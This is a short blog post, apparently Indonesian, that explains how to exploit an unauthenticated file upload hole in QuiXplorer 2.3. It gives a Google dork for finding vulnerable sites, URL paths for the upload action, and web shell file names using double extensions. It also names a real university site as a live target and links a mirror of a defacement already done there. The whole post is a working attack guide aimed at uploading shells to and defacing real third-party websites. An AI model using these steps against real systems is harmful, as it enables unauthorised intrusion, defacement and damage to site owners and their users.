"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily
open Google.com and type this dork
intitle:"QuiXplorer 2.3 - the QuiX project"
you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
after Going to this you will saw a file manager
you can upload your files here
after index.php? example : |
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view
Live demo :
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes
http://www.hcs.harvard.edu/~eac/letters/filestorage/
i know some asshole will chnage the deface
so its mirrOr of defacements http://attack-h.org/attack/?id=8452
Tidak ada komentar:
Posting Komentar